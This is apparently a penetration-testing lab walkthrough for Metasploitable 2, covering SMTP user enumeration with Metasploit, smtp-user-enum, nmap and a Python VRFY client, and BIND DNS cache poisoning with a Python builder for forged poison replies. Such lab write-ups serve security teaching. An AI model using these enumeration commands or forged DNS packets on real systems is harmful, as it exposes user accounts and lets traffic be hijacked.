Metasploitable 2 Walkthrough: Part III

Exploiting Port 25 – SMTP

SMTP stands for Simple Mail Transfer Protocol. It is the protocol mail servers use to hand messages to one another (and that clients use to submit mail). A server that accepts mail for local delivery keeps a list of the local users and mailboxes it delivers to, and the protocol's VRFY and EXPN commands can leak that list to anyone who can reach port 25.

Exploiting SMTP using Metasploit

Our first task is to determine which software and version is listening on port 25. Metasploit's auxiliary/scanner/smtp/smtp_version module grabs the banner for you, so try it:

Enumerating SMTP with MSF

With the product and version from the banner, you can now search Google, ExploitDB, etc. for known issues.

You can also enumerate the service's users with the matching Metasploit module, auxiliary/scanner/smtp/smtp_enum:

Enumerating SMTP users with MSF

The module was able to extract a list of users from the SMTP service.

Exploiting SMTP using other tools

SMTP is a line-oriented text protocol, so you can drive it by hand: connect to port 25 with Netcat, send HELO, and then probe the server's user database with VRFY <user> (does this local user exist?), EXPN <list> (expand a mailing list) or a MAIL FROM / RCPT TO pair. The reply code tells you the answer: a 2xx code for a name the server knows, 550 for an unknown one on a server that honours VRFY.

Or, instead of verifying users one by one, use smtp-user-enum with the VRFY method (-M VRFY) and a wordlist:

smtp-user-enum -M VRFY -U user.txt -t [Target IP]

or a single name:

smtp-user-enum -M VRFY -u root -t [Target IP]
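The VRFY exchange that Netcat and smtp-user-enum drive, written out as an added Python example (it is not code from the original post or from any of the tools above). So that it runs offline, it starts a constructed fake SMTP server on loopback that answers VRFY the way Postfix typically does on Metasploitable 2 (252 for a known local user, 550 5.1.1 for an unknown one); the banner, hostname and user list inside it are invented. Point vrfy_enum() at [Target IP] and port 25 instead of the fake server to run it against the lab.

```python
import socket
import threading

# Constructed stand-in for the target: a tiny fake SMTP server that answers
# VRFY with 252 for a "local" user and 550 5.1.1 for an unknown one. It exists
# only so the client below can run offline; it is not Metasploitable's Postfix.
FAKE_LOCAL_USERS = {"root", "msfadmin", "postgres", "www-data"}
FAKE_BANNER = b"220 metasploitable.localdomain ESMTP Postfix (Ubuntu)\r\n"


def _serve_client(conn):
    conn.sendall(FAKE_BANNER)
    buf = b""
    with conn:
        while True:
            chunk = conn.recv(1024)
            if not chunk:
                return
            buf += chunk
            while b"\r\n" in buf:
                line, buf = buf.split(b"\r\n", 1)
                verb, _, arg = line.decode("ascii", "replace").partition(" ")
                verb, arg = verb.upper(), arg.strip()
                if verb in ("HELO", "EHLO"):
                    conn.sendall(b"250 metasploitable.localdomain\r\n")
                elif verb == "VRFY":
                    if arg in FAKE_LOCAL_USERS:
                        conn.sendall(b"252 2.0.0 " + arg.encode() + b"\r\n")
                    else:
                        conn.sendall(b"550 5.1.1 <" + arg.encode() + b">: Recipient address "
                                     b"rejected: User unknown in local recipient table\r\n")
                elif verb == "QUIT":
                    conn.sendall(b"221 2.0.0 Bye\r\n")
                    return
                else:
                    conn.sendall(b"502 5.5.2 Error: command not recognized\r\n")


def start_fake_smtp_server():
    """Bind the fake server on a free loopback port; returns (listening socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:  # listening socket closed
                return
            threading.Thread(target=_serve_client, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def read_reply(f):
    """Read one SMTP reply, including multi-line '250-' continuations; returns (code, text)."""
    lines = []
    while True:
        raw = f.readline()
        if not raw:
            raise ConnectionError("server closed the connection")
        line = raw.decode("ascii", "replace").rstrip("\r\n")
        if len(line) < 3 or not line[:3].isdigit():
            raise ValueError("malformed SMTP reply: %r" % line)
        lines.append(line[4:])
        if len(line) < 4 or line[3] != "-":  # '-' after the code means more lines follow
            return int(line[:3]), "\n".join(lines)


def vrfy_enum(host, port, candidates, timeout=5.0):
    """One connection, HELO, then one VRFY per candidate. Returns (banner, {user: (code, text)})."""
    results = {}
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        banner = read_reply(f)
        s.sendall(b"HELO enum.local\r\n")
        read_reply(f)
        for user in candidates:
            s.sendall(b"VRFY " + user.encode() + b"\r\n")
            results[user] = read_reply(f)
        s.sendall(b"QUIT\r\n")
    return banner, results


def classify(results):
    """Split results into acknowledged (2xx) and rejected (550) names.
    Caveat: a server with VRFY disabled answers 252 (or 502) for every name, so
    the method is only informative when known-bad names actually come back 550."""
    valid = sorted(u for u, (code, _) in results.items() if 200 <= code < 300)
    unknown = sorted(u for u, (code, _) in results.items() if code == 550)
    return valid, unknown, bool(unknown)


if __name__ == "__main__":
    srv, port = start_fake_smtp_server()
    banner, res = vrfy_enum("127.0.0.1", port, ["root", "msfadmin", "nosuchuser"])
    print(banner)
    for user, (code, text) in res.items():
        print(code, user, text)
    print(classify(res))
    srv.close()
```

The third value returned by classify() is the check worth keeping: if every name, including a deliberately bogus one, comes back 252, the server is not really verifying anything and the wordlist results mean nothing.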

Nmap's smtp-enum-users script can also do this, although in this lab the script did not work reliably:

nmap --script smtp-enum-users -p 25 [Target IP]

Enumerating SMTP users with Nmap

As a side note, keep enum4linux in mind as another source of usernames. It enumerates users over SMB (ports 139/445) rather than SMTP, and the names it returns make a good wordlist for the VRFY checks above:

enum4linux -U [Target IP]

However, smtp-user-enum and enum4linux are older Perl scripts that have seen little maintenance, so don't be surprised if they don't always produce the best results inside the current Kali version (2020.3).

Exploiting Port 53 – BIND

The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) of the Internet. It performs both of the main DNS server roles: acting as an authoritative name server for domains, and acting as a recursive resolver for clients on the network. As of 2015, it is the most widely used domain name server software and is the de facto standard on Unix-like operating systems.

Searching for exploits for ISC BIND 9.4.2, you will find the following exploit:

https://www.exploit-db.com/exploits/6122/

This exploit is implemented in Metasploit as auxiliary/spoof/dns/bailiwicked_domain. It is a cache-poisoning attack against a recursive resolver: the resolver is tricked into caching attacker-supplied NS and glue records for a domain it does not own, so later lookups for that domain are answered from the attacker's data.

Exploiting DNS: bailiwicked domain

This attack lets you plant your own nameserver as the authority for a whole domain in the target resolver's cache. Once that entry is cached, any name under the domain, say somethingveryevil.microsoft.com, resolves to wherever you wish for every client that uses that resolver.

After setting the options for the module, it should be possible to test it, but it fails:

Failed MSF module

And the exploit itself also fails. Keep the attack's prerequisites in mind when this happens: the target must act as a recursive resolver for the attacker's queries, and the module has to win a race against the real authoritative server by guessing the transaction ID before the genuine reply arrives. On an isolated lab network with no upstream DNS the resolver never completes the lookup that the forged replies are meant to hijack, so the race cannot be won.

Exploiting DNS: bailiwicked host

This attack poisons a single hostname instead of a whole domain. The module asks the resolver for random names under the target domain and floods it with forged replies carrying guessed transaction IDs; whichever forged reply matches first is cached as the address of the chosen host.

Failed MSF module

Similar exploit, similar results.
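To make the bailiwick rule behind both modules concrete, here is an added Python example (it is not the original post's code nor the Metasploit module's). It builds the forged reply a Kaminsky-style spoofer races against the genuine answer, parses it back, and filters it the way a resolver's bailiwick check does, which is why the planted nameserver has to carry a name inside the victim domain. It also computes the per-packet hit probability that made source-port randomization the fix. The names (example.com, ns1.example.com, ns.attacker.net, 203.0.113.10) and the transaction ID are made up, and the code only builds packets in memory; nothing is sent.

```python
import struct

TYPE_A, TYPE_NS = 1, 2
TYPE_NAMES = {TYPE_A: "A", TYPE_NS: "NS"}


def _encode_name(name):
    """Wire-format a dotted name as length-prefixed labels, no compression."""
    labels = [l for l in name.strip(".").split(".") if l]
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def _decode_name(data, off):
    """Decode a name at offset off (follows compression pointers); returns (name, next_off)."""
    labels, end = [], None
    while True:
        length = data[off]
        if length & 0xC0 == 0xC0:               # compression pointer to an earlier name
            if end is None:
                end = off + 2
            off = ((length & 0x3F) << 8) | data[off + 1]
            continue
        off += 1
        if length == 0:
            break
        labels.append(data[off:off + length].decode())
        off += length
    return ".".join(labels), (end if end is not None else off)


def _rr(name, rtype, rdata, ttl=300):
    return _encode_name(name) + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata


def build_poison_response(txid, qname, zone, evil_ns, evil_ip):
    """Forged authoritative reply for the random-name query qname: no answer,
    an NS record claiming evil_ns is authoritative for zone, and glue that
    maps evil_ns to evil_ip. The attacker sends many of these with different txid guesses."""
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, 0, 1, 1)  # QR|AA, 1 question, 1 NS, 1 glue
    question = _encode_name(qname) + struct.pack("!HH", TYPE_A, 1)
    authority = _rr(zone, TYPE_NS, _encode_name(evil_ns))
    additional = _rr(evil_ns, TYPE_A, bytes(int(o) for o in evil_ip.split(".")))
    return header + question + authority + additional


def parse_response(data):
    """Minimal DNS response parser: returns txid, flags and the three RR sections."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", data[:12])
    off = 12
    for _ in range(qd):
        _, off = _decode_name(data, off)
        off += 4                                 # QTYPE + QCLASS
    parsed = {"txid": txid, "flags": flags}
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        rrs = []
        for _ in range(count):
            name, off = _decode_name(data, off)
            rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
            off += 10
            rdata = data[off:off + rdlen]
            off += rdlen
            if rtype == TYPE_A:
                value = ".".join(str(b) for b in rdata)
            elif rtype == TYPE_NS:
                value, _ = _decode_name(data, off - rdlen)
            else:
                value = rdata.hex()
            rrs.append((name, TYPE_NAMES.get(rtype, str(rtype)), value))
        parsed[section] = rrs
    return parsed


def in_bailiwick(owner, zone):
    """The bailiwick rule: a resolver only caches records whose owner is at or below
    the zone it asked about, so glue for ns.attacker.net is dropped, ns1.example.com kept."""
    owner, zone = owner.strip(".").lower(), zone.strip(".").lower()
    return owner == zone or owner.endswith("." + zone)


def cacheable_glue(parsed, zone):
    return [rr for rr in parsed["authority"] + parsed["additional"] if in_bailiwick(rr[0], zone)]


def spoof_success_probability(forged_packets, port_space=1):
    """Chance that at least one forged packet matches the resolver's outstanding query.
    With a fixed source port only the 16-bit TXID must be guessed; random ports
    multiply the space by port_space (up to 65536), which is the post-2008 mitigation."""
    space = 65536 * port_space
    return 1 - (1 - 1 / space) ** forged_packets
```

Note what cacheable_glue() keeps in the two cases: with ns1.example.com as the planted nameserver both the NS record and its glue survive the filter, while with ns.attacker.net the glue is thrown away and the attacker gains nothing.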
